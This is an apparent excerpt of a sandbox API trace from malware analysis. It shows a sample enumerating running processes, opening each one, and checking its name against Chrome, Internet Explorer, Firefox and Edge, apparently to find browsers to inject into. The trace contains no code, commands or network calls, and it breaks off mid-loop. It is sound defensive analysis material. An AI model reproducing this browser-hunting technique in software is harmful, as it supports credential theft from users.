	[0203.698] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0203.699] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2680
	[0203.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.699] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0203.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.700] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.700] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0203.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.700] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.701] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.701] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2684
	[0203.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.702] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.702] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.702] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.702] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.703] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.703] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x2688
	[0203.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.703] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.704] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.704] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.704] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.705] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.706] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x268c
	[0203.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.706] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.706] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.706] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.707] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.707] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x2690
	[0203.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.708] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.708] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.708] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.709] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.709] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x2694
	[0203.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.710] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.710] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.710] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.711] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.711] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x2698
	[0203.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.712] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.712] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.712] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.712] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.713] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.713] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x269c
	[0203.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.713] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.714] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.714] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.714] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.715] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0203.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x26a0
	[0203.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.715] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0203.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.716] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.716] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0203.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.716] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.716] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.717] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x26a4
	[0203.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.717] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.718] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.718] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.718] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.718] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0203.719] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x26a8
	[0203.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.719] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.720] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.720] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.720] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.720] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0203.724] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x26ac
	[0203.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.724] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0203.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.724] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.724] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0203.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.725] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.725] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.726] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x26b0
	[0203.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.726] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.726] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.726] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.727] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.727] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0203.728] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x26b4
	[0203.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.728] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0203.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.728] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.728] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0203.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.729] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.729] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0203.730] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x26b8
	[0203.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.730] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0203.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.730] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.730] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0203.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.731] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.731] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0203.731] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x26bc
	[0203.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.732] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0203.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.732] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.732] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0203.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.732] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.732] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0203.733] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x26c0
	[0203.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.733] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0203.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.734] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.734] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0203.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.734] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.734] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0203.735] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0203.735] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0203.736] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x26c4
	[0203.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.736] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0203.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.737] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.737] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0203.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.738] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.738] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0203.739] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x26c8
	[0203.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.739] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0203.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.739] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.740] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0203.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.740] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.740] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0203.741] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x26cc
	[0203.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.741] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0203.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.741] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.742] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0203.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.742] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.742] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0203.743] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x26d0
	[0203.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.743] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0203.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.743] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.744] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0203.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.744] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.744] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0203.745] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x26d4
	[0203.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.745] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0203.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.746] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.746] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0203.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.747] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.747] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0203.748] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x26d8
	[0203.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.748] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0203.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.748] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.748] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0203.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.749] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.749] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0203.749] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x26dc
	[0203.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.749] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0203.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.750] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.750] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0203.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.751] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.751] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0203.752] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x26e0
	[0203.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
